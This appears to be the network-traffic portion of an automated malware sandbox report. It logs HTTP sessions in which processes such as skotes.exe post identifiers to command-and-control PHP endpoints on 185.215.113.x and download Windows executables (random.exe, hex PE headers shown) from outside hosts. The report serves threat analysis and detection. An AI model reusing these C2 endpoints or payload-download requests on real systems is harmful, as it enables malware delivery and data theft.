Nov 22, 2024 20:35:37.261081934 CET	1236	IN	Data Raw: 36 53 44 54 05 25 a7 58 8a 00 f0 35 fd f7 8e 68 02 61 6b f9 a2 ae de b5 b6 75 13 68 8c e0 2c f3 f5 27 a9 32 78 3e c4 03 ac fd 69 aa 0d 7d af e9 29 bc 4e e2 25 85 3f 35 31 6e 72 8d b3 b4 0b dc 60 26 35 6d a3 23 a5 3a 0e e6 80 58 7a cf b1 e6 6a cd Data Ascii: 6SDT%X5hakuh,'2x>i})N%?51nr`&5m#:XzjydoCX!H]q%%*Wd?9xWWokpa2afo;`2hyS7;PWxt}^G0[Xfd[ 0tt=S=D?--mu7

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49760	185.215.113.206	80	7540	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:35:40.792963028 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBA Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--
Nov 22, 2024 20:35:42.643117905 CET	203	IN	HTTP/1.1 200 OK Date: Fri, 22 Nov 2024 19:35:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49782	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:04.717155933 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 22, 2024 20:36:06.094841003 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49789	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:07.730245113 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 22, 2024 20:36:09.122832060 CET	644	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 63 35 0d 0a 20 3c 63 3e 31 30 30 38 32 35 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 31 30 30 38 32 35 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 30 38 32 35 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 30 38 32 35 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 63 [TRUNCATED] Data Ascii: 1c5 <c>1008250001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbd97e9c4543b31de15441#1008251001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1008252001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1008253001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1008254001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49794	31.41.244.11	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:09.247175932 CET	54	OUT	GET /files/random.exe HTTP/1.1 Host: 31.41.244.11
Nov 22, 2024 20:36:10.680845976 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:10 GMT Content-Type: application/octet-stream Content-Length: 4419072 Last-Modified: Fri, 22 Nov 2024 17:40:31 GMT Connection: keep-alive ETag: "6740c20f-436e00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 f0 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 c6 00 00 04 00 00 27 dc 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 da c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 da c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL<g(Is2J@ 'C@ _qsX px'@.rsrc p'@.idata q'@ 9q'@bgrcdjci '@aezravivHC@.taggant0"LC@
Nov 22, 2024 20:36:10.680960894 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:10.681045055 CET	448	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:10.681092978 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:10.681157112 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: *h9r,=XZa`J#`R
Nov 22, 2024 20:36:10.681202888 CET	448	IN	Data Raw: b7 83 41 1c f2 a0 7f 26 bc 04 8a 52 b2 8c 67 e3 84 8e c9 d6 c3 f4 3f 78 b1 50 f6 2d 8c 3b f2 c5 a8 4f b7 4a ea 93 73 a3 be c6 18 be e6 41 3b 28 59 a5 83 93 45 90 ac 38 d7 3f 32 2b 0e cc dc 6f 09 3c a0 39 c6 46 ef bf 2b 8b e0 91 b4 ae c5 11 dc 06 Data Ascii: A&Rg?xP-;OJsA;(YE8?2+o<9F+1B]R9P<,!=s}V8^_K7QHr&AuD=j~p3K?FC aQ,$es\|
Nov 22, 2024 20:36:10.681252003 CET	1236	IN	Data Raw: cc 5d e7 6b 5b 8e a9 e7 ff c5 a6 69 3c 8d a2 fe 5e 0c 10 66 40 19 10 43 50 90 e3 9a 50 1d 86 eb 91 10 f5 83 9b 1b 64 31 93 20 52 a6 f5 57 f4 c7 6e a7 f1 9e 3b bc 19 f6 bb ef df 06 10 a0 45 ca f9 06 95 91 f6 4d fe 8d 77 27 d6 cd ab 6d 71 f3 77 2c Data Ascii: ]k[i<^f@CPPd1 RWn;EMw'mqw,?<H\_+~yf7aG]lGrP,8I^l$n\|MyPgCb t<qO_U:?i.VhR6(@)Ph>d]\|\|EXfr
Nov 22, 2024 20:36:10.681299925 CET	1236	IN	Data Raw: 72 a0 0b 5d 26 fb 6f 5d 5c 2c 8d 32 90 a1 9e 3e cd 7c 99 65 5b 60 25 52 d2 c9 da 97 d4 37 b2 3e 90 95 e8 a3 da c7 24 0f 85 54 a9 e7 7b 30 af 4f c7 2e f2 0d a5 9f ba 5b 79 30 da c2 1f 7f d2 3b 6b 44 1b 3d 9a 77 de 22 90 e0 d2 7f bf 95 1f 82 c6 22 Data Ascii: r]&o]\,2>\|e[`%R7>$T{0O.[y0;kD=w""U8%[{Yo\hEb<q}}c".xr![<+bjE@eYEWhe-l@!?=$E<31[>OmvOsF'+s(x
Nov 22, 2024 20:36:10.681344986 CET	448	IN	Data Raw: 75 dc 52 f5 8e 89 72 c7 bc 4f 3e b2 91 4b dc 63 c0 92 e8 06 b0 26 e8 54 d8 5b de 5d f6 20 4a c5 c1 f7 ba 15 ba 69 01 1f 5e ce 36 a2 23 65 e9 97 1b 72 ea 7f 14 5f 33 93 7c bc 91 f9 9f f0 de 27 9d 7c eb 9c 13 b2 51 85 11 f8 d2 db 4e e6 2d 06 35 76 Data Ascii: uRrO>Kc&T[] Ji^6#er_3\|'\|QN-5v1M5L.P7A'%s@\W4r/$/VXvHx/?PkI<r~zsM1E~GYZ27rwCYRqPll
Nov 22, 2024 20:36:10.681396008 CET	1236	IN	Data Raw: c2 a7 d2 8c b1 fe bb 4d f6 84 1f 2b 48 46 72 72 36 5c b8 f4 8f 6a 0b a7 84 20 aa ce 6b cb 47 13 52 7d 67 5f d5 19 62 56 d8 80 5f 7c 09 3e 75 98 17 13 36 a1 0d 08 ab 4e c6 44 a2 20 8a 84 99 b2 78 1b cd 9b 85 cd d5 d7 5d 2f 47 ff 8f 89 78 85 f3 ec Data Ascii: M+HFrr6\j kGR}g_bV_\|>u6ND x]/GxNjX#JIxe/JZIGt!yVNpfNo::?WNmmHQrYhKx$l5\y{6p,j aPK_Zihdlo]/Y
Nov 22, 2024 20:36:10.801309109 CET	1236	IN	Data Raw: 0a 84 74 91 f6 fa c6 be 6d 2e 11 1e 62 c8 cf 48 22 61 ce 76 85 27 f5 66 40 4c ea 64 b2 8a 76 a2 da 06 c0 9b 19 51 7a 32 32 14 27 a8 11 b7 4d aa 54 28 61 b8 86 25 a6 bb 78 bf f6 8d 94 3c ea 67 7c 37 25 0a 91 3b c1 8f bd c6 a4 8c d8 24 c1 91 84 bf Data Ascii: tm.bH"av'f@LdvQz22'MT(a%x<g\|7%;$COyrve z-wCHbM>js+u{1H/]0fmdG`/V('1,AKBSl13F'X08DbKkr>0B%W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49821	185.215.113.43	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:21.028105974 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 38 32 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008250001&unit=246122658369
Nov 22, 2024 20:36:22.417721987 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49822	34.116.198.130	80	4296	C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:21.764230013 CET	87	OUT	GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1 Host: home.fvtekk5pn.top Accept: /
Nov 22, 2024 20:36:23.321583033 CET	1236	IN	HTTP/1.1 200 OK server: nginx/1.22.1 date: Fri, 22 Nov 2024 19:36:23 GMT content-type: application/octet-stream content-length: 10815536 content-disposition: attachment; filename="36EpLiutqfXtaXMkXOTru;" last-modified: Tue, 19 Nov 2024 12:29:07 GMT cache-control: no-cache etag: "1732019347.4431374-10815536-3919321515" Data Raw: 9b 04 9e 1d e2 2a 68 73 fe d9 48 6f 2c 36 36 c8 a4 e4 ba e7 12 f9 22 5d 6f 07 aa d2 fb 8c a2 b3 95 1e b6 6c ff 92 32 40 41 97 30 99 34 26 c9 44 c2 1e 7f 22 13 cd 10 62 a7 32 f3 c2 5c 11 ed c0 71 4a 49 c7 9d 3e 95 07 3e 4a 0a 6f 63 4c 1a b8 b6 1a 3d 67 8e 9d ed 46 4c 04 61 0a c6 3c 7b 3a f6 0d 3f 30 0d 33 18 56 4c f0 76 7a 8b c7 a1 f1 75 64 d6 00 c3 e9 df 3a 1b 4f 35 50 64 a6 db 6b 23 6a aa e6 6c 33 a4 69 a7 80 16 e0 e4 49 7c d0 73 7d bf 61 a2 62 7a 62 8e 5b f4 4d a9 ba 05 ae 7f d8 0c 3c 1e 71 cb 84 47 32 b1 63 64 df 8e 7a 22 8c 8e 33 7d f1 20 f1 74 04 61 fd 18 55 10 be 45 7d f4 63 45 d4 d0 16 17 c4 c8 a6 7d 44 80 d2 ba e9 1a 17 37 63 43 e4 22 3e c5 e4 a4 16 51 4f 2d 57 23 3a 36 33 fa f3 c5 aa 04 00 79 5c 1f 43 8d f1 b2 56 df 86 17 bc df 28 44 b7 aa 85 64 2d 2f 94 0d a5 7c 18 37 92 cb 0d 76 40 2e 05 16 6a ce b1 8c 0a e3 7d 08 00 ce 6a ef d3 51 b9 3b 81 19 3c 3f 6c 3e 37 fe 3f d7 b3 7d 60 7e e2 b1 a4 1f 00 62 27 63 3d fd 4b 06 87 dc 8e 8e fa 56 9b bf 7a dc a3 07 20 e3 0b 1a f5 06 b1 0f 6d 27 af dd 1b [TRUNCATED] Data Ascii: hsHo,66"]ol2@A04&D"b2\qJI>>JocL=gFLa<{:?03VLvzud:O5Pdk#jl3iI\|s}abzb[M<qG2cdz"3} taUE}cE}D7cC">QO-W#:63y\CV(Dd-/\|7v@.j}jQ;<?l>7?}`~b'c=KVz m'3~\K ^m_F<4xrG/dz4?gv5,?^w@X^wZ1~7C+Z&dp`#9XgJC>e93VGh74x?x[3=YT.Qa `MG?_zGkB+(#8RUeY[x-$4`zAc`vmVlP+>tsd@>ydCHSnt+_`"FitXXD.}P #(4K<0b h;]6{bgEqvZ>4o]2?}#\|![L&!z";ZY<PPT9HC}M*65qs#ep%@LlGH)bj'7a: ;B3L0"
Nov 22, 2024 20:36:23.321613073 CET	1236	IN	Data Raw: b8 ff 32 30 58 cd 81 20 5f b7 4d f7 d5 77 53 0a 4f e7 60 83 ed 44 cc d0 f5 71 1e 4e 4f f8 01 9b 7d 28 47 50 fb 75 8d 8e 55 9f 9d c6 2b 06 24 6f 58 e4 80 8f e0 a2 b4 79 5d f7 cf 4a e0 fc b8 91 16 d1 c7 db 64 34 ea ff 9a 7a 67 99 a9 5e e5 15 9c c8 Data Ascii: 20X _MwSO`DqNO}(GPuU+$oXy]Jd4zg^h(>sNk=@nIEbcZ"~Q6]4AGc]>2+<X]2]CRq[Ya{YvF{m2*bg3\|8IBlm&
Nov 22, 2024 20:36:23.321661949 CET	368	IN	Data Raw: 31 a0 27 b0 31 e8 22 a5 51 78 81 6b ea a9 43 84 11 c4 be 3a 3c 17 d0 63 57 c5 20 31 2f c5 f3 3d bf 67 df 7f 0a 0e 93 9c af 04 65 f3 af a9 d4 4f 98 e4 8e ec 3f 1b 0f e9 f3 b7 01 21 79 8f 56 8d ec 70 82 ac 4b 64 58 ce 90 f4 54 8d 94 fe aa 7b 06 b3 Data Ascii: 1'1"QxkC:<cW 1/=geO?!yVpKdXT{`6u}]dTlC%hU.\|zi<kGB5}mP=PNp?%G~e\|NSF{)OfI"&l6~/YLm#K>
Nov 22, 2024 20:36:23.343024969 CET	1236	IN	Data Raw: b1 66 4a 02 0e dd be 64 22 b0 f8 19 45 ae c2 ec fe 2d 2d dc 29 f0 07 36 69 cf 32 9c 05 20 ca 7b 43 14 3c 44 6b 94 6f 6d 1f 92 0a 41 a5 2b 8f de 86 48 ca 99 d6 f9 2a d5 fb 97 cc 17 8a 95 46 ca a7 fd 76 0c b8 81 9b 02 47 a9 7f 28 ce 6a 97 59 d7 69 Data Ascii: fJd"E--)6i2 {C<DkomA+H*FvG(jYiV\31G0E!BW`.YbLt54JI36?lKTHu"}xZEtL\|TZA92uyrsE.] PC7CP[@}(u'Hm
Nov 22, 2024 20:36:23.343097925 CET	1236	IN	Data Raw: c4 8a 99 c3 05 0e c3 f3 f4 ca c5 c5 9b 83 9d d2 ab 52 ce 4b e4 49 26 fa 1a b7 96 28 43 73 3e 48 9d 58 05 18 ad 72 4a d6 d4 89 dd e6 69 7e 3b 30 b1 c4 b8 a3 dd 14 f5 8f 2f 9c 6d 75 55 1a 12 ea af 03 ce 15 df 6c a5 01 4f b8 d0 22 c4 b9 d8 7c 9e c8 Data Ascii: RKI&(Cs>HXrJi~;0/muUlO"\|,4z.5:g`kWx[_SS~{j6a1o{H+iFFV?VMFQw7bW>wTeh2?Cc7@;^fM=o6Fd
Nov 22, 2024 20:36:23.343137026 CET	368	IN	Data Raw: 79 d1 b7 be 6f 57 fb 83 81 2d fe ef d8 a3 c7 f4 3d 53 21 48 bc 12 40 05 e8 e9 10 ca 9a a9 03 e2 b0 01 3b 33 5a 25 bf 57 bc c9 7d fa 45 71 90 14 d1 63 41 0f b1 91 f4 16 46 c2 48 a1 05 1c 65 ba d6 2e 64 7a 8e cf 9b be 6c 42 76 70 fb 7e d6 a2 d1 ca Data Ascii: yoW-=S!H@;3Z%W}EqcAFHe.dzlBvp~r+*iimg9<D@uVn-o<WQ$Jjbe]J-4D9hB]n!V5lrX_P$b}[O B:<l4gIAPFw%2a`^_dA
Nov 22, 2024 20:36:23.343170881 CET	1236	IN	Data Raw: b7 6f 78 2f 72 9a f8 71 ee 3e 4d ec cd e0 d6 39 1b 0b f8 cc 7b 0a 55 40 86 a4 38 5e 83 b5 fc e0 93 ab 8f 79 ff 2c ea 7f fb f5 e0 1c 04 c9 78 b4 a0 79 3e 8c 6f 69 95 1c c9 72 b5 b0 e6 fb 54 c9 c0 3c 1a e1 a6 31 d1 0f 6c 0f 0f 85 ac e2 b0 b2 c7 c3 Data Ascii: ox/rq>M9{U@8^y,xy>oirT<1lV{\|g9wy(`}Dc}:&4(;'"1kzZpZ97~}<m{)F)O^Rh0r2^5n-h!`/=F:3V $?`S8PV(H0G
Nov 22, 2024 20:36:23.343205929 CET	1236	IN	Data Raw: 57 2c 20 61 54 7a b6 2c 68 3b 66 61 73 1c 1d e2 eb 23 01 c0 46 a0 c6 87 aa 95 40 ad 7b 08 bb 48 0d 79 be 2c f9 13 49 ba 00 72 3e f6 f7 54 25 f7 1d c0 95 14 90 7f 7d 58 7c 28 e3 12 6d ed 4d ed 8f 3a b7 07 70 d4 c0 68 0f c2 e9 27 a1 ad 3b 66 f8 e6 Data Ascii: W, aTz,h;fas#F@{Hy,Ir>T%}X\|(mM:ph';fv6 6N5t]S\|.<aoYRBb7VgfLh08uW_<u[:kh##2%dK5##uJ4Bn_~l(N~vZ\ `@K0az
Nov 22, 2024 20:36:23.343240976 CET	1236	IN	Data Raw: 8a ac 93 f1 40 89 d6 2c 25 56 e7 e7 41 fd cd d9 61 4d 91 fd 4b 75 7c 5d 61 0b a7 ca cb 09 1b 09 34 ff e6 94 6e 26 f6 27 39 04 39 79 da e6 00 ae aa a2 07 e7 bc 49 aa d1 5d cd 91 c5 aa 07 88 63 cf 61 81 8d e5 b0 0d e5 93 1b ca 3b a7 2f 7a af b5 3b Data Ascii: @,%VAaMKu\|]a4n&'99yI]ca;/z;^>@'IM7fJWfvAIm2H}N\MwK`3Lg[/UJ1>{__1iB4F}ZExM94.uxmsD
Nov 22, 2024 20:36:23.343276978 CET	1236	IN	Data Raw: 08 0e d1 7d 8a 52 c9 be 69 d8 e5 9d d1 00 d0 55 c5 87 82 ce d7 d1 ca 69 be fd 71 99 5c 54 66 4b a1 cd b8 e2 c2 02 78 bf e6 ef 7a 01 4c 6a 15 3c 0f 62 bb bf 8b 54 2c bd de f4 05 20 5a ec 24 3a 37 f4 55 5a 34 8e 12 75 e9 4f 2e 0a 95 45 cc 01 f9 66 Data Ascii: }RiUiq\TfKxzLj<bT, Z$:7UZ4uO.Ef&`z#"][mmJ4(t<d:TAGtNn)CD,p^i8V"Y=er>`QQ29_%q2/"MX(`OsTAt\@`x
Nov 22, 2024 20:36:23.447707891 CET	1236	IN	Data Raw: e5 79 5d 24 42 ce 7c 56 10 26 41 55 fe de 3b 20 03 b1 c2 47 63 14 61 88 83 5f 30 ee c8 0f b1 bd ce 17 88 b0 c9 58 84 eb 93 99 2e f1 0f 64 62 cc ee 57 41 66 2c 6e 3b 90 2c 15 48 64 e3 81 84 5e ed f5 9c 3e 83 42 a3 05 be 47 02 f2 87 c0 5c 51 8f 8b Data Ascii: y]$B\|V&AU; Gca_0X.dbWAf,n;,Hd^>BG\QI)g\|RIS\|j=b@//}{2Gf\|3U^h3H8l1p]Nq$`T>=[[&7+$?+yk9}3.x;FcQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49823	185.215.113.16	80	7896	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 22, 2024 20:36:22.629501104 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 22, 2024 20:36:24.073118925 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 22 Nov 2024 19:36:23 GMT Content-Type: application/octet-stream Content-Length: 1856000 Last-Modified: Fri, 22 Nov 2024 19:33:01 GMT Connection: keep-alive ETag: "6740dc6d-1c5200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 51 3c 3f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 0a 04 00 00 c2 00 00 00 00 00 00 00 70 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 49 00 00 04 00 00 d4 df 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 80 05 00 70 00 00 00 00 70 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELQ<?gpI@I@\pp `b@.rsrcpr@.idata t@ *v@ackgsmri/x@nodwasaq`I,@.taggant0pI"0@
Nov 22, 2024 20:36:24.073200941 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 22, 2024 20:36:24.073225975 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
